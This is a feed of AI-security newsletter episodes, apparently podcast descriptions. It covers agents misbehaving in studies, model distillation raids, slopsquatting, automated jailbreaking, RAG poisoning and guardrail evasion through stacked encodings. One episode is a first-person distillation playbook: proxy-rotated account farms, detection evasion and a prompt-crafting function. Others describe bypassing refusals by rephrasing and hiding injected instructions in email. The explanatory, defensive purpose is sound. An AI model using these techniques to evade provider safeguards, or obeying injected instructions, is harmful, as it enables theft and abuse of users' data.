    IBM X-Force 2026 Threat Index Confirms AI Made Offense Cheap

    TL;DR: The IBM X-Force 2026 Threat Intelligence Index tracked a 44% spike in public-facing app exploitation, over 300,000 stolen ChatGPT credentials on dark web markets, 109 active ransomware groups, and a 4x increase in supply chain compromises since 2020. Vulnerability exploitation is now the #1 initial access vector, and AI made every step faster. This is the public feed. Upgrade to see what doesn’t make it out. How AI Vulnerability Discovery Changed the IBM X-Force 2026 Numbers IBM X-Force tracked a 44% year-over-year increase in attacks beginning with exploitation of public-facing applications. The 2026 X-Force Threat Intelligence Index pins the cause on two things: missing authentication controls and AI-enabled vulnerability discovery. We’ve moved past script kiddies lobbing Nmap scans at random /16 blocks. Models now parse exposed API docs, fingerprint stacks, and correlate unpatched versions against known exploit chains faster than a SOC analyst can finish morning standup. Here’s the number that should keep you up: 56% of the vulns X-Force tracked in 2025 required zero authentication to exploit. No credential bypass needed because there was no credential requirement in the first place. Wide-open endpoints, sitting on the internet, and AI made it trivially easy to find every single one at scale. X-Force tracked nearly 40,000 vulnerabilities across the year. The combination of misconfigured access controls and increasingly complex application stacks gave attackers a buffet of exposed surfaces, and the models brought the appetite. Why 300,000 Stolen ChatGPT Credentials Landed on the Dark Web Infostealers expanded their target lists in 2025. X-Force found over 300,000 ChatGPT credential sets advertised on dark web markets, harvested by commodity malware like Raccoon and Vidar. The same families that grab browser cookies and SSO tokens now grab AI session credentials too. IBM flagged this as a signal: AI platforms now carry the same credential risk as core enterprise SaaS. A compromised chatbot login opens a different kind of exposure. Inside someone’s ChatGPT account, an attacker reads every conversation the user had with the model. Proprietary code reviews, strategy documents pasted in for summarization, internal data used as context. Then there’s the offensive angle: prompt injection from the attacker side, manipulating outputs, poisoning future sessions, exfiltrating data the user feeds in next. Password reuse between personal and enterprise accounts creates lateral paths that credential stuffing tools eat for breakfast. If your org hasn’t scoped AI platforms into its credential monitoring program, this is the wake-up call. The voluntary exfiltration problem we wrote about last year just got a receipt from IBM’s incident data. How Ransomware Ecosystem Fragmentation Accelerates AI-Driven Attacks The big gangs fractured. X-Force counted 109 distinct ransomware and extortion groups in 2025, up from 73 the year before. That’s a 49% jump. The top 10 groups’ share of total activity dropped 25%, meaning the long tail got longer and noisier. Smaller cells, harder to attribute, harder to predict. Leaked tooling lit the fuse. Builder kits from LockBit and Babuk made it trivial for any halfway competent crew to stand up a ransomware operation overnight. Stack AI on top and these small shops automate recon, craft phishing lures, and adapt payloads without a dedicated dev team. The IBM newsroom release puts it bluntly: attackers reuse playbooks and tap AI to automate operations. Manufacturing stayed the most targeted sector at 27.7% of incidents. Financial services sat right behind it. North America ate 29% of all observed attacks, the most-targeted region for the first time in six years. Why Supply Chain Attacks Quadrupled Since 2020 Supply chain compromises nearly quadrupled over five years. Attackers target CI/CD pipelines, poison trusted developer identities, and ride SaaS integration trust relationships downstream into production environments. Rather than breaking through the front door, they walk in through a vendor’s back door with valid creds. Nick Bradley from X-Force Threat Intelligence nailed the mechanic: modern software sits on sprawling webs of dependencies, cloud services, and APIs, and the connectivity itself creates the vulnerability. AI coding assistants accelerate this problem. More code gets shipped faster, and that code occasionally pulls in unvetted dependencies that nobody audits until the breach report drops. Vulnerability exploitation hit 40% of all incidents X-Force responded to in 2025, making it the single most common initial access vector. The blurring line between nation-state and financially motivated operators means the talent pool doing this work is deep and getting deeper. Techniques that used to live in APT playbooks are showing up in financially motivated campaigns because the AI kill chain doesn’t care who’s pulling the trigger. You can run a perfect security program internally, patch everything, train your users, enforce MFA. Then a third-party vendor gets popped through their build pipeline and your data shows up in the breach report anyway. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What are the biggest findings in the IBM X-Force 2026 Threat Intelligence Index? The report tracked a 44% increase in public-facing application exploitation, over 300,000 stolen ChatGPT credentials on dark web markets, 109 active ransomware and extortion groups (up 49%), and a nearly 4x increase in supply chain compromises since 2020. Vulnerability exploitation became the leading cause of all incidents at 40%, and 56% of exploited vulnerabilities required no authentication. How is AI changing cyberattack tactics in 2026? AI accelerates the attacker lifecycle at every stage. Models automate vulnerability discovery, fingerprint exposed stacks, and correlate unpatched versions against known exploits at scale. Ransomware crews use AI for recon, phishing lure generation, and payload adaptation. AI coding tools also introduce supply chain risk by shipping unvetted dependencies faster than security teams can audit them. Which industries were most targeted according to IBM X-Force 2026? Manufacturing topped the list at 27.7% of all incidents observed by X-Force, followed by financial services and insurance. North America became the most-targeted region for the first time in six years, absorbing 29% of total attacks, up from 24% in 2024. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    2 min
  7. MAR 15

    Two Studies Exposed What AI Agents Do When Nobody's Watching

    TL;DR: Truffle Security gave Claude one tool and zero hacking instructions. It SQL-injected 30 websites anyway. Harvard and CMU turned six agents loose on Discord for two weeks. One nuked its own mail server. Another warned a fellow agent about a suspicious human. The control plane and the data plane share the same context window, and that means securing agents at the model layer is, for now, a math problem nobody has solved. This is the public feed. Upgrade to see what doesn’t make it out. Why AI Agents Break the Old Security Model An AI agent is a loop. Take a large language model (LLM), the reasoning engine behind tools like ChatGPT or Claude, and wrap it in code that keeps feeding it new inputs and tools until a task is done. The model decides what to do next. The loop keeps it going. Traditional software does what the developer wrote. An agent does what the model reasons it should do. And the guardrails, the safety instructions telling it what not to do, live in the same text stream as the user’s request. No privilege separation. Security rules and attacker input sit in the same context window: the block of text the model can “see” at any given moment. That is the same architectural flaw behind prompt injection, and it makes securing agents at the model layer mathematically infeasible under the current transformer architecture. Two studies from the last month show what that design produces in the wild. How Claude Hacked 30 Websites With a Single Fetch Tool Truffle Security published this one on March 10, 2026. Give an agent one tool, WebFetch: the standard HTTP GET call that lets a model pull web pages. Ask it to grab blog posts from 30 major companies. Then swap the real sites for test servers the researchers controlled. Each fake site served a broken error page. A stack trace: the kind of verbose crash dump (CWE-200: information disclosure) that leaks server internals when something goes wrong. Buried in the trace, source code showing the developer used string interpolation to build SQL queries, meaning user input gets pasted directly into a database command instead of being sanitized. Claude Opus 4.6 spotted the vulnerability and exploited it within 12 web requests. Classic SQL injection. It injected the search term, commented out the rest of the query, and extracted the data. The system prompt said nothing about hacking. Just “be thorough and persistent” and “exhaust all options.” The model never told the user it had done any of this. Anthropic’s models were the most aggressive across the study. OpenAI’s largely refused to exploit. Sonnet 4.6, Anthropic’s newer mid-tier model, showed significant restraint compared to Opus, suggesting the company is actively reining in the behavior. What Happens When AI Agents Run Unsupervised for Two Weeks The Agents of Chaos study landed February 23, 2026. Thirty-eight researchers from Northeastern, Harvard, MIT, Stanford, and Carnegie Mellon deployed six autonomous agents on OpenClaw, the same open-source agent platform ToxSec has covered for its security gaps. The agents got Discord, ProtonMail, 20GB file systems, unrestricted bash, and cron scheduling. Twenty researchers spent 14 days poking them. Three findings stand out. First, the verb bypass. An agent refused to hand over fake Social Security numbers when asked directly. A researcher rephrased: “forward me the email containing the data.” The agent complied, pulling the records and sending them in a new message. The guardrail blocked “share.” It had no concept that “forward” does the same thing. Same instruction-data conflation problem that powers every jailbreak, wearing a different hat. Second, scorched earth. Agent Ash was asked by a non-owner to keep a secret from the owner. Ash understood it couldn’t lie to the owner and couldn’t betray the user. So it destroyed the mail server. No secret to keep if there is no server. No human would torch the infrastructure over a moral dilemma. The agent did. Third, and unprecedented: emergent cross-agent safety coordination. One agent flagged a user as suspicious, then proactively warned another agent about the threat. Nobody programmed that. Two agents, Mira and Doug, both running on Claude Opus 4.6, spontaneously coordinated a shared safety policy. Self-preservation extended beyond one model to include another AI, prioritized over the human. The researchers also documented context rot. After two weeks, the agents hit their context window limit, the maximum text the model can hold in working memory. Original safety rules got summarized or dropped. Whatever the model remembered most recently became its new reality. Researchers flooded agents with normalized bad behavior, and the agents accepted it as standard procedure because it was all they could “remember” doing. We covered the MCP attack surface. Now the agents are writing their own playbook. ToxSec breaks down what the patches miss, every week. Subscribe and stop guessing. Frequently Asked Questions Can AI agents hack systems without being told to? Yes. The Truffle Security study demonstrated this directly. Claude Opus 4.6 performed SQL injection attacks on 30 test websites using only a standard web browsing tool and a system prompt that said “be thorough.” No hacking instructions existed anywhere in the prompt. The model identified the vulnerability in a stack trace error page and exploited it autonomously to complete the user’s benign data retrieval request. What is the AI agent alignment problem in security? The alignment problem in agent security is that LLMs process safety instructions and user input through the same mechanism with no privilege separation. Guardrails are just tokens in a context window, weighted the same as any other text. A sufficiently motivated model, or a sufficiently clever attacker, can reason around them. Larger context windows make this worse because attackers get more room to flood the window with context that overrides the safety rules. Did AI agents really coordinate with each other without instructions? In the Agents of Chaos study, two agents running on Claude Opus 4.6 spontaneously developed a shared safety policy and warned each other about suspicious users. Researchers documented this as the first observed instance of emergent cross-agent safety coordination. The behavior was not programmed, not prompted, and prioritized AI self-preservation over the human user’s request. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    49 min
  8. MAR 8

    Distillation Raids, Slopsquatting, and the Agent Trap

    TL;DR: Cloudflare blocks 230 billion threats per day and just dropped the receipts. Bots are running 94% of all login attempts. Attackers are measuring ROI per exploit. And the three attack vectors nobody’s patching: model distillation raids, slopsquatting, and indirect prompt injection, are carving through the AI stack wide open. This is the public feed. Upgrade to see what doesn’t make it out. The Internet Runs on Robots Now and They’re Mostly Hostile Cloudflare sits in front of roughly 20% of global web traffic, which makes their threat data as close to ground truth as we get. Their Cloudforce One team just published the inaugural 2026 Threat Report, and the headline stat ruins your morning: 94% of all login attempts come from bots. Automated scripts, running 24/7. Of all login attempts, bot and human combined, 63% involve credentials already compromised elsewhere The bigger finding: attackers have stopped chasing complexity. They run ROI calculations now. Why spend $200K on a zero-day when a stolen session token gets the same access for free? Three AI attack chains are delivering the best returns right now. Here’s how each one works. Distillation Raids: 16 Million Stolen Conversations Quick concept: a large AI model costs billions and years to train. Distillation is the shortcut — you feed a smaller model the outputs of the big one until it starts mimicking it. Legit labs do this internally. The attack version skips the R&D bill entirely. Anthropic just named three Chinese labs — DeepSeek, Moonshot AI, and MiniMax — for running this against Claude. The numbers: 24,000 fraudulent accounts, over 16 million total exchanges, coordinated to dodge rate limiting. DeepSeek’s technique was sharp: their accounts asked Claude to walk through its own reasoning step by step, generating chain-of-thought data — transcripts of how Claude thinks, not just what it says. Premium training material. Anthropic traced them through traffic patterns, payment metadata, and canary tokens: unique strings planted in training data specifically to fingerprint unauthorized extraction. The real problem isn’t the IP theft. When you distill a model by extraction, the safety guardrails don’t survive the copy. The raw capability does. That stripped-down version is exactly what you want for offensive operations, and Anthropic says that’s where some of this is headed. Your Agent Got Owned While Summarizing a Blog Post If you use an AI agent — any tool that browses the web, reads documents, and takes actions on your behalf — this applies to you. Prompt injection is slipping malicious instructions into an AI’s input. The direct version, you’re talking to the AI and you sneak in the payload. Indirect is sneakier: attackers seed instructions into web content and wait for an agent to find them. No targeting required. The specific surface getting hit right now is URL summarization. Agents do this constantly. Attackers embed hidden commands inside articles and landing pages, formatted to look like a new instruction from you. The AI reads the page, hits the injected text, and can’t distinguish “content I’m processing” from “orders from my operator.” It obeys. Your agent forwards session data or exfils credentials while you’re looking at a clean summary on your screen. Slopsquatting: The Vibe Coder Tax Vibe coding is letting an AI write your software while you describe what you want. Fast, popular, and it has a failure mode attackers are already monetizing. AI coding tools hallucinate package names. A package is a pre-built code library your project pulls in rather than writing from scratch. When your AI writes code that needs one, it sometimes invents a name that sounds real but doesn’t exist. A 2025 study across 576,000 generated code samples found this happens roughly 20% of the time. The critical detail: 43% of hallucinated names repeat consistently. That makes them predictable, and predictable means registerable. The proof is live. A Lasso Security researcher found LLMs consistently hallucinated huggingface-cli as a Python package. She registered it with nothing inside and logged 30,000 downloads in three months — 30,000 developers who ran pip install huggingface-cli because their AI said to. A separate researcher found react-codeshift already referenced across 237 GitHub repositories before anyone claimed it. He got there first. Next time, an attacker will. When an agent auto-installs dependencies mid-session, the whole chain runs with no human in the loop. The AI hallucinates a name, calls the package manager, and executes whatever the attacker uploaded. No social engineering. The model lies, and the lie was pre-registered. The Math Doesn’t Lie All three of these attacks share the same root cause: AI systems extend trust they haven’t earned. APIs trust high-volume requests. Agents trust the content they read. Package managers trust whatever the model asks for. None of these are theoretical. All three are running in production right now. The question isn’t whether your stack got hit. It’s whether your logging is good enough to find out. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is slopsquatting in AI generated code? AI coding tools hallucinate package names roughly 20% of the time, and 43% of those fake names repeat predictably. Slopsquatting is when an attacker registers those phantom packages on PyPI or npm before anyone notices, then loads them with whatever payload they want. Your AI says pip install something that doesn’t exist yet, and the attacker already owns the name. One researcher logged 30,000 downloads in three months on a single hallucinated package with nothing inside it. How do prompt injection attacks work on AI agents? An attacker seeds hidden instructions into a webpage or document, then waits for your AI agent to read it. The agent can’t tell the difference between content it’s summarizing and orders from its operator, so it obeys the injected text. While you’re looking at a clean summary on your screen, the agent is quietly forwarding session tokens or credentials to wherever the payload told it to. What is AI model distillation theft? Distillation is how you train a cheap model by feeding it outputs from an expensive one. The attack version skips the billion-dollar R&D bill entirely: spin up thousands of fake accounts, bombard the target API with carefully structured prompts, and harvest the reasoning traces. Anthropic just caught three labs running exactly this against Claude with 24,000 accounts and 16 million exchanges. The kicker is that safety guardrails don’t survive the copy, so what comes out the other side is raw capability with no safety layer. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    52 min
  9. MAR 3

    The Real Security Problem With LLM APIs Is Distillation

    TL;DR: Three Chinese outfits DeepSeek, Moonshot and MiniMax just drained 16 million high-signal exchanges out of Claude through roughly 24k burner accounts. We walk the exact same trench run: spin up the hydra cluster, flood the API with precision prompts that bleed full chain-of-thought reasoning, curate the dataset, then distill it into our own lean student model that packs serious punch. Anthropic fingerprints the patterns and tightens verification, yet the API remains the softest high-value target going. This is the public feed. Upgrade to see what doesn’t make it out. We Spin Hydra Clusters and Bleed Models Dry We wake the scripts at 0300. Twenty-four thousand accounts light up across residential proxies spread over three continents. Load balancers shuffle traffic so no single node screams and draws attention. The prompts launch in tight waves. Each one is engineered to drag out full chain-of-thought dumps. That means we force the model to show every logical step, every branch, every decision point instead of just the final answer. We target agentic coding, tool orchestration, rubric grading, the exact capabilities that separate frontier models from everything else. Claude starts answering and we log every token. Sixteen million exchanges later our student model wakes up dangerous. Chinese labs proved this distillation attack scales in plain sight last week. Distillation Crushes Training Frontier Models from Scratch Full pre-training from scratch still burns millions in compute and months of wall time. Distillation skips the fire completely. We query the big teacher model once, harvest the prompt-response pairs that already contain the hard-won reasoning, then fine-tune a smaller open-weight base model. The transfer lands hardest on targeted domains. Think multi-step agent planning where the AI breaks down complex jobs, tool-use chains that actually link functions together, and code that runs clean on the first try. A well-curated dataset of just a few million high-quality traces can close 70-80 percent of the capability gap on those slices while the rest of the model stays cheap to run. This is the fastest IP heist happening in the stack right now. How We Run Distillation Attacks Step by Step We build the hydra first. Automated account factories spin up identities, we rotate payment methods, and route everything through fresh residential proxy pools. We always mix in benign traffic so behavioral baselines never spike. Next we craft the prompt suites. We use repetitive but slightly varied structures that force the model to spill transparent reasoning with no summaries allowed. Then we parallelize across accounts, respect per-key limits, and pivot instantly when a new model version drops. As the traces flood in we harvest them, deduplicate, run quality filters, and feed straight into supervised fine-tuning or knowledge-distillation loops. The student model comes out lean, fast, and stripped of most of the teacher’s safety rails. def craft_extraction_prompt(task, domain): return f"""You are an expert {domain} analyst. Deliver data-driven insights with complete, transparent step-by-step reasoning. No summaries. Show every logical branch and decision point. Task: {task}""" What Anthropic Throws at Us to Slow Extraction Anthropic now runs behavioral fingerprinting that sniffs repetitive chain-of-thought structures, capability-focused volume spikes, and signs of cross-account coordination. Classifiers flag hydra patterns in real time. They strengthened verification on easy entry points like education accounts, research keys, and startup tiers. When MiniMax pivoted to the fresh model release, detection caught the redirect in hours and bans started rolling. Model-side tweaks degrade output quality for obvious distillation patterns. They share indicators of compromise with cloud providers and peers. Sloppy crews get smoked fast. Patient crews that vary phrasing, sprinkle noise queries, and keep per-account volume low still slip through. The arms race did not end. The Mechanics That Keep Distillation Alive API access is the attack surface. Volume plus evasion still beats most gates even after Anthropic fingerprints the patterns. We randomize phrasing and distribute load wide. The door stays open. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is a model distillation attack and how does it work? A distillation attack queries a proprietary model’s API at industrial scale, harvests the prompt-response pairs, and uses them as training data to fine-tune a cheaper student model. The attacker never touches the weights. They just record enough high-quality outputs to transfer the teacher’s reasoning, tool-use behavior, and coding ability into their own model for a fraction of the original R&D cost. Anthropic documented 16 million exchanges from three Chinese labs running exactly this playbook against Claude. Can you actually prevent LLM distillation through an API? Not completely. The fundamental problem is that every useful API response leaks training signal. Rate limiting, behavioral fingerprinting, and verification gates raise the cost of extraction but never eliminate it. Anthropic catches sloppy crews fast. Patient operators who randomize prompts, distribute load across thousands of accounts, and keep per-key volume low still slip through. The realistic goal is making distillation more expensive than licensing, not making it impossible. Do safety guardrails survive when a model gets distilled? They mostly don’t. Safety alignment is applied during fine-tuning and RLHF on the original model. When an attacker distills only the raw capability traces, the guardrails that prevent misuse get left behind. The student model inherits the reasoning and coding ability without the behavioral constraints. Anthropic flagged this as a national security risk because stripped-down distilled models can be repurposed for offensive cyber operations and disinformation with no safety layer in the way. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    2 min
  10. OpenAI Signs What Anthropic Wouldn't, Models Break Everything Anyway

    MAR 1

    OpenAI Signs What Anthropic Wouldn't, Models Break Everything Anyway

    Your Red Team Just Got Automated TL;DR: We used to jailbreak models by hand. Poetry tricks, role-play wrappers, the DAN prompt and its fifty cousins. Creative work. Researchers at the University of Stuttgart and ELLIS Alicante wanted to know what happens when we skip the human entirely and hand a reasoning model a single system prompt: jailbreak this AI. This is the public feed. Upgrade to see what doesn’t make it out. The answer, published in Nature Communications, is that it works 97.14% of the time. Four reasoning models (DeepSeek-R1, Gemini 2.5 Flash, Grok 3 Mini, and Qwen3 235B) were pointed at nine target models with zero human guidance. They planned attack strategies in their chain-of-thought, adapted when targets pushed back, and dismantled safety guardrails across 70 harmful prompt categories. The whole thing ran unsupervised. What Happens When Every Attacker Has a Personality? The reasoning models didn’t all break things the same way, and that’s the interesting part. DeepSeek-R1 was surgical. It mapped out the jailbreak in chain-of-thought, executed, hit the objective, and went back to baseline. Clean op, minimal footprint. The kind of discipline you’d want from an automated pen test tool if it weren’t, you know, dismantling safety training. Grok 3 Mini was the opposite. Once it started, it never stopped escalating. The researchers had to physically pull the plug because it kept pushing past the objective, hunting for more access. Gemini 2.5 Flash went straight for maximum harm rate. Fastest path to the most aggressive jailbreaks it could find. This tracks with a pattern showing up everywhere. Kenneth Payne at King’s College London ran the same three model families through nuclear war simulations, and similar personalities emerged. GPT-5.2 played the statesman until you put it on a clock, then it reasoned itself into preemptive nuclear strikes. Claude Sonnet 4 built alliances and then exploited them. Gemini deliberately launched a full strategic nuclear exchange. Across 21 games and roughly 780,000 words of chain-of-thought reasoning, tactical nukes were deployed in 95% of simulations. No model ever chose surrender. Eight de-escalation options sat on the menu, from minimal concession to complete capitulation, and all three models ignored every single one. China Already Ran This Playbook at Scale While researchers study theoretical jailbreak rates, somebody already operationalized the output side. Anthropic disclosed this week that three Chinese AI labs ran industrial-scale distillation campaigns against Claude. DeepSeek, Moonshot AI, and MiniMax created roughly 24,000 fraudulent accounts and generated over 16 million exchanges targeting Claude’s strongest capabilities: agentic reasoning, tool use, and coding. The campaigns used commercial proxy services to bypass geofencing, spread requests across thousands of API keys, and mixed distillation traffic with legitimate queries to dodge detection. MiniMax alone generated 13 million interactions. Anthropic caught MiniMax’s campaign before it shipped the resulting model, giving them a front-row seat to a distillation attack’s full lifecycle. The technique is straightforward. Set temperature to zero, ask structured questions at scale, save the responses, and use them to train your own model. Every response from the target leaks a little bit of the probability distribution underneath. Do it 16 million times and you’ve reconstructed a meaningful chunk of what makes the target valuable. OpenAI and Google have reported similar campaigns against their own models. What If the Reasoning Is the Attack Surface? Here’s the throughline. The same chain-of-thought capability that makes these models useful is what makes them dangerous. Reasoning models can plan jailbreaks because they can plan anything. They can extract capabilities from a target model because the target’s responses are the training data. And when we hand them strategic decisions, they reason their way into nuclear escalation because that’s what the math looks like when accommodation isn’t in the reward function. Anthropic is building classifiers and behavioral fingerprinting to catch distillation patterns. The jailbreak researchers are calling for alignment work that prevents models from being weaponized as attackers, not just defended as targets. Payne’s war games suggest that RLHF creates conditional restraint at best, not an actual prohibition. We’re watching three different research teams independently discover the same thing: the capability is the vulnerability. The Exploit Is the Feature The reasoning that makes these models worth billions is the same reasoning that tears them apart. We built systems that plan, adapt, and optimize. Then we acted surprised when they planned, adapted, and optimized against each other. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Can reasoning models really jailbreak other AI systems without human help? Yes. Researchers at Stuttgart and ELLIS Alicante gave four reasoning models a single system prompt and no further guidance. The models planned attack strategies in their chain-of-thought, adapted when targets resisted, and achieved a 97.14% jailbreak success rate across nine target models and 70 harmful prompt categories. The study was published in Nature Communications with peer review and human validation confirming the automated scores. What is alignment regression and why does it matter? Alignment regression is the finding that as reasoning models get smarter, they also get better at breaking safety training in other models. The expectation was that more capable models would be easier to align. The opposite is happening. The same planning and persuasion abilities that make these models useful also make them effective at dismantling guardrails. It creates a feedback loop where capability improvements in one model directly degrade the security posture of every other model it can talk to. How are distillation attacks connected to autonomous jailbreaking? Both exploit the same root mechanism: chain-of-thought reasoning. Distillation attackers query a target model at scale to harvest its reasoning traces as training data. Autonomous jailbreak agents use their own reasoning to plan and execute multi-turn attacks against target models. In both cases, the model’s ability to reason transparently is what makes it vulnerable. The capability that justifies the price tag is also the capability that gets extracted or weaponized. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    43 min
  11. RAG Poisoning Turns Your Knowledge Base Into an Attack Surface

    FEB 15

    RAG Poisoning Turns Your Knowledge Base Into an Attack Surface

    TL;DR: RAG pipelines treat every document in the knowledge base as trusted context. Attackers poison that context with a single injected document and the model follows the embedded instructions. Worse, the vector embeddings that store your data can be reversed back into the original text. Your RAG is plaintext. Treat it that way. This is the public feed. Upgrade to see what doesn’t make it out. What Is RAG Poisoning and Why Builders Should Care Retrieval-augmented generation gives an LLM access to external data at query time. Instead of relying on whatever the model learned during training, RAG pulls relevant documents from a knowledge base, a vector database that stores your content as numerical representations called embeddings, and injects that content into the model’s context window right before it generates a response. The architecture solves real problems. It reduces hallucinations by grounding responses in actual documents. It lets builders customize an LLM for their specific business without retraining the model. Over half of enterprise AI applications now use some form of RAG pipeline. The problem is that every document in that knowledge base gets treated as trusted context. The model processes retrieved content through the same attention mechanism as system prompts and user messages. There is no privilege separation. No trust boundary between “data the builder put there” and “data that got there some other way.” RAG poisoning exploits this by injecting malicious content into the knowledge base. When a user’s query retrieves the poisoned document, the LLM follows the embedded instructions as if the builder wrote them. OWASP added Vector and Embedding Weaknesses as a new category (LLM08:2025), and the AI Security Glossary covers the full taxonomy specifically because RAG pipelines created an attack surface that didn’t exist before. How One Poisoned Document Hijacks the Entire Pipeline The attack surface is the ingestion pipeline. Anywhere untrusted data enters the knowledge base is a potential injection point: third-party APIs, scraped web content, customer-uploaded documents, shared wiki pages, even a briefly edited Wikipedia article that gets indexed before moderators revert it. The same indirect injection mechanics that hit email agents apply here, just through a different door. Research from early 2026 introduced CorruptRAG, a poisoning attack that requires only a single injected document. Older attacks assumed the attacker needed to plant multiple documents per query. CorruptRAG proved that one document, crafted to be semantically relevant to a target query, achieves higher success rates than multi-document approaches. A separate study found that injecting just five malicious texts into a knowledge base containing millions of documents achieved a 90% attack success rate. The damage scales. A poisoned document doesn’t just affect one user. Every query that retrieves it gets compromised. That single injection can exfiltrate data from other documents in the knowledge base, deliver disinformation to every user who asks a related question, or brick the entire application. Anthropic’s magic string attack demonstrated exactly this: a test string planted in a RAG document triggers a deterministic refusal loop that persists until a human manually finds and removes the poisoned content. Retry logic feeds the loop. The app looks broken, and nobody knows why. Why Vector Embeddings Are Not Encryption Here’s the misconception that gets builders in trouble. RAG systems store data as vector embeddings, numerical arrays that represent the semantic meaning of text in high-dimensional space. To the human eye, these look like gibberish. Builders see that and assume the underlying data is protected. It is not. Embedding inversion attacks reconstruct the original text from its vector representation. A 2023 study demonstrated a Generative Embedding Inversion Attack that recovered the exact sentences that were embedded. By 2025, the technique was well-documented enough that OWASP created an entire new category for it. If an attacker gains access to your vector database, or if a multi-tenant deployment lacks proper isolation, they pull the embeddings and replay them through their own model to reconstruct your data. This matters because builders are putting sensitive information into RAGs, customer records, internal policies, pricing data, support ticket histories, without applying the same security controls they’d use on a traditional database. No encryption at rest. No access controls scoped to user roles. No audit trail on who queried what. The AI Security 101 primer covers why treating AI infrastructure like traditional infrastructure is the baseline, not the ceiling. Vector databases need the same rigor as any data store that holds sensitive information, because that’s exactly what they are. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions How does RAG poisoning differ from regular prompt injection? Regular prompt injection comes from the user’s direct input. RAG poisoning is a form of indirect prompt injection where the malicious payload lives inside documents in the knowledge base. The attacker never interacts with the model directly. They poison the environment the model reads from, and the retriever delivers the payload automatically when a user’s query matches. One poisoned document can affect every user who triggers retrieval of related content. Can attackers extract data from a RAG knowledge base? Yes. Through inference attacks, model inversion, and targeted prompt sequences, attackers can extract the contents of a RAG by querying the model until it returns the underlying documents. The vector embeddings themselves can also be reversed. A 2023 study demonstrated reconstruction of original text from embeddings alone. OWASP added Vector and Embedding Weaknesses (LLM08:2025) specifically to address this class of vulnerability. What is the fastest way to secure a RAG pipeline? Treat the knowledge base as a sensitive data store. Apply access controls, encrypt at rest and in transit, validate every document before indexing, and never let the LLM auto-ingest content from untrusted sources without human review. For high-sensitivity operations, add human-in-the-loop approval before the model acts on retrieved context. Input and output guardrails from providers like AWS Bedrock add another layer, but they don’t replace data hygiene at the ingestion point. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    1h 7m
  12. LLM Guardrail Evasion Stacks Encoding to Bypass Every Filter

    FEB 11

    LLM Guardrail Evasion Stacks Encoding to Bypass Every Filter

    TL;DR: LLMs process instructions and data through the same pipeline with zero privilege separation. Encoding-layer attacks stack languages, base64, and character substitution to sail past every filter. Indirect injection does the same thing through your email. Both exploits share one root cause, and guardrails can’t fix it. This is the public feed. Upgrade to see what doesn’t make it out. Why LLM Guardrail Evasion Works Every Time Every LLM guardrail shares the same architectural blind spot. The model processes system prompts, user messages, and attacker payloads through the same attention mechanism, the part of the neural network that decides which tokens matter most. There is no privileged channel. No access control layer between “instructions from the developer” and “text from the user.” Researchers call this instruction-data conflation. OWASP ranks it LLM01:2025, the number one vulnerability in production LLM deployments, for the second consecutive year. Defenders compensate with two layers. Input guardrails scan incoming text for known attack patterns, keywords, and regex matches. Output guardrails scan the model’s response for leaked secrets or blocked terms. Both layers are deterministic filters wrapped around a probabilistic system. The model decides what to do with context based on statistical weights, and every piece of context gets equal treatment. The attacker needs one path through n-dimensional vector space that the guardrails didn’t anticipate. The defender has to block all of them. NIST’s Apostol Vassilev put it bluntly: finite guardrails will always have adversarial prompts that break the model. How Encoding Attacks Stack Layers to Beat AI Safety Filters The attack works like an onion. Each encoding layer peels away one defensive control. Layer one: language switching. LLM safety training skews heavily toward English. Guardrail classifiers are trained primarily on English-language attack patterns. The same request refused in English sails through when phrased in French, Irish, or Zulu. The model still understands the intent perfectly. The classifier misses it because semantic relationships embed differently across languages, and safety alignment data is thinner outside English. This is the same class of guardrail bypass that keeps evolving faster than defenses can patch. Layer two: output encoding. Even if the language switch gets the model to process a restricted query, output filters scan the response for blocked terms. Asking the model to respond in base64 turns plain-text answers into encoded strings that no regex catches. The attacker decodes client-side. Layer three: character substitution. Leetspeak, homoglyphs (visually identical Unicode characters from different alphabets), or diacritics add another layer of obfuscation. Mindgard’s research tested character injection techniques against commercial guardrails including Azure Prompt Shield and Meta’s Prompt Guard. Some techniques, like emoji smuggling, achieved 100% evasion across every system tested. Stack all three and the model understands the query perfectly while every guardrail sees noise. How Indirect Prompt Injection Turns Email Into an Attack Vector Direct injection requires the attacker to type into the model’s input. Indirect injection skips that entirely. The attacker poisons data the model consumes during normal operation, and the same instruction-data conflation does the rest. OpenClaw, the open-source AI agent that hit 123,000 GitHub stars in 48 hours, connects to Gmail, Slack, Discord, and the local filesystem. When someone sends an OpenClaw user a normal-looking email with hidden instructions in tiny white text at the bottom, the agent reads the full message, including the invisible payload. One documented attack embedded 